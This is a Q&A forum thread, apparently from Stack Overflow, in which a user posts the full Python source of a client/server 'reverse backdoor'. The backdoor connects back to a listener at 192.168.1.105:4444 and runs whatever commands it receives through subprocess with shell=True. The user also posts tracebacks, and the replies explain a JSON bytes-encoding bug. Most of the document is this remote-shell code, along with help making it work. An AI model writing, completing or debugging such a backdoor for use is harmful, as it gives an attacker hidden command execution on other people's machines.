# Programming a backdoor with python 3.x

Tags: python, python-3.x, sockets, networking, network-programming

i'm writing a clinet/server backdoor with python 3 and a have got error when running code

when i try to put some command on input
I got this error from client side:

```
Traceback (most recent call last):   File "reverse_backdoor.py", line
31, in <module>
    my_backdoor.run()   File "reverse_backdoor.py", line 25, in run
    command = self.relaible_receive()   File "reverse_backdoor.py", line 18, in relaible_receive
    return json.loads(json_data)   File "/usr/lib/python3.7/json/__init__.py", line 348, in loads
    return _default_decoder.decode(s)   File "/usr/lib/python3.7/json/decoder.py", line 337, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())   File "/usr/lib/python3.7/json/decoder.py", line 355, in raw_decode
    raise JSONDecodeError("Expecting value", s, err.value) from None json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char
0)
```

and i got this error from server side:

```
Traceback (most recent call last):   File "listener.py", line 36, in
<module>
    my_listener.run()   File "listener.py", line 31, in run
    result = self.execute_remotely(command)   File "listener.py", line 25, in execute_remotely
    self.reliable_send(command.encode('utf-8'))   File "listener.py", line 17, in reliable_send
    json_data = json.dumps(data)   File "/usr/lib/python3.7/json/__init__.py", line 231, in dumps
    return _default_encoder.encode(obj)   File "/usr/lib/python3.7/json/encoder.py", line 199, in encode
    chunks = self.iterencode(o, _one_shot=True)   File "/usr/lib/python3.7/json/encoder.py", line 257, in iterencode
    return _iterencode(o, 0)   File "/usr/lib/python3.7/json/encoder.py", line 179, in default
    raise TypeError(f'Object of type {o.__class__.__name__} ' TypeError: Object of type bytes is not JSON serializable
```

here is my listener:

```
#!/usr/bin/python
import json
import socket


class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] Waiting for incoming connection")
        self.connection, address = listener.accept()
        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def relaible_receive(self):
        json_data = self.connection.recv(1024)
        return json.loads(json_data)

    def execute_remotely(self, command):
        self.reliable_send(command.encode('utf-8'))
        return self.relaible_receive()

    def run(self):
        while True:
            command = input('>>')
            result = self.execute_remotely(command)
            print(result)


my_listener = Listener("192.168.1.105", 4444)
my_listener.run()
```

And here is my backdoor:

```
#!/usr/bin/python
import socket
import subprocess
import json


class Backdoor:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def relaible_receive(self):
        json_data = self.connection.recv(1024)
        return json.loads(json_data)

    def execute_system_command(self, command):
        return subprocess.check_output(command, shell=True)

    def run(self):
        while True:
            command = self.relaible_receive()
            command_result = self.execute_system_command(command.decode('utf-8'))
            self.reliable_send(command_result)
my_backdoor = Backdoor("192.168.1.105", 4444)
my_backdoor.run()
```

Comment: They proble is data recived is bytes, have to cast/convert to string

Comment: @Wonka ok but how? i some kinda do that with decode('utf-8'). but that's not working

Answer (score 0):

You're encoding before sending to `json.dumps`.  Encode *after*:

```
>>> import json
>>> json.dumps('command'.encode('utf8'))
       ...
TypeError: Object of type 'bytes' is not JSON serializable

>>> json.dumps('command').encode('utf8')
b'"command"'
```

Comment: i did that but i'm facing error again. can you tell me what should my code look like?